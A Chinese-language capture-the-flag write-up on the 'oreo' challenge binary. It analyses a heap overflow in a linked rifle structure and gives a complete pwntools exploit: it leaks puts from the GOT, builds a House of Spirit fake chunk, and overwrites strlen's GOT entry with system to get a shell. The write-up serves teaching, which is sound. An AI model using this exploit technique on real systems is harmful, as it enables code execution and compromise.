House_Of_Spirit ctf oreo程序分析
提取码:t4xx
程序分析
int __cdecl main()
{
leave_add = 0;
leave_del = 0;
leave_buf = (char *)&unk_804A2C0;
...
...
menu();
return 0;
}
main函数中先赋值了三个全局变量,这三个变量在.bss段是连续的
在这个程序中,没有setvbuf设置输出缓冲,在遇到printf 打印没有 '\n'的字符串时,可能不会输出到终端
ps:我在这里纠结了好久,我在python中 recv就是收不到东西,气skr人,(小白,菜)
下面看一个菜单中的第一个函数
通过这个函数的分析,把malloc出来的东西解析偏移,定义结构体,便于分析
struct Rifle
{
char description[25];
char name[27];
struct Rifle* fd;
}
unsigned int new()
{
...
p = struct_P; //初始 struct_P 是等于0的
struct_P = (Rifle *)malloc(56);
if ( struct_P )
{
struct_P->fd = (int)p; //指向之前申请的内存
printf("Rifle name: ");
fgets(struct_P->name, 56, stdin); //堆溢出,这个位置可以修改结构中指向下个结构的指针
str_end_nul(struct_P->name); //没什么用的一个函数
printf("Rifle description: ");
fgets(struct_P->description, 56, stdin);
str_end_nul(struct_P->description);
++leave_add;
}
...
}
第二个函数:
unsigned int show_rifle()
{
...
for ( i = struct_P; i; i = (Rifle *)i->fd )
{
printf("Name: %s\n", i->name);
printf("Description: %s\n", i);
...
}
在这个函数中,只要 i 不为0,就不会退出,i的赋值又是指向下一个结构
而在第一个结构可以修改fd这个位置,如果在new函数中,把fd指向got表中puts的地址
就可以 printf("Description: %s\n", i); 打印出puts 在libc中的地址,从而找到system的地址
第三个函数:
unsigned int del()
{
...
v2 = struct_P;
if ( leave_add )
{
while ( v2 )
{
ptr = v2;
v2 = (Rifle *)v2->fd;
free(ptr);
}
struct_P = 0;
++leave_del;
puts("Okay order submitted!");
}
...
}
在这个函数中,如果struct_P=0,就会结束,但是,在new函数中,我们可以修改v2->fd ,意思就是把这个0改成我们想要的位置,用来free 到fastbin中,malloc后,实现任意地址的修改
第4个函数:
unsigned int leave()
{
unsigned int v0; // ST1C_4
v0 = __readgsdword(0x14u);
printf("Enter any notice you'd like to submit with your order: ");
fgets(leave_buf, 128, stdin);
str_end_nul(leave_buf);
return __readgsdword(0x14u) ^ v0;
}
这个函数用来 向 leave_buf 写数据
而在main中 char *leave_buf = (char *)0x804A2C0;
如果把 leave_buf指向的位置改向got表 就可以修改got中的内容
利用代码
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from pwn import *
p = process('./oreo')
elf=ELF('./oreo')
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
#context.log_level='debug'
#context.terminal = ["tmux","splitw","-h"]
#context.arch = "i386"
def add(name,description):
p.sendline('1')
p.sendline(name)
p.sendline(description)
def show_rifle():
p.sendline('2')
p.recvuntil('Description: ')
p.recvuntil('Description: ')
return u32(p.recv(4).ljust(4,'\x00'))
def del_all():
#gdb.attach(p,'b *0x8048855')
p.sendline('3')
p.recvuntil('Okay order submitted!\n')
def leave(payload):
p.sendline('4')
p.sendline(payload)
#1 leak出got表中已找到的地址
name='a'*27+p32(elf.got['puts'])
add(name,'0')
puts_addr= show_rifle()
success('1.puts_addr = '+hex(puts_addr))
#2得到system的地址
libc_base = puts_addr-libc.symbols['puts']
system_addr = puts_addr+libc.symbols['system']-libc.symbols['puts']
success('2.system_addr = '+hex(system_addr))
#3 伪造一个chunk
for i in range(0x40-2): #ps:为什么-2?前面已经add一次 后面我还要add一次
add('a'*27+p32(0),str(i))
leave_buf = 0x0804a2a8
payload = 'b'*27 + p32(leave_buf)
add(payload,'cccc')
#现在leave_add是0x40,fd又指向了&leave_add+4的位置,还差下一个chunk的size位
payload='\x00'*36+p32(100)#(leave_buf指向的地址-leave_buf)+36是下一个chunk的size位
leave(payload)
del_all()
#ps: leave_buf=0x804A2C0
payload = p32(elf.got['strlen'])
add('bbb',payload)
#ps:这里是向char *leave_buf中写入数据,而现在 leave_buf=elf.got['strlen']
leave(p32(system_addr)+';/bin/sh\x00')
#elf.got['strlen']这个地址中原本是strlen的地址,现在改成了system的地址
p.interactive()
一开始我不会改got表,就直接在0x804A2C0伪造chunk 我认为这样方便,捣鼓了好长时间,结果,C了个呵呵的.....
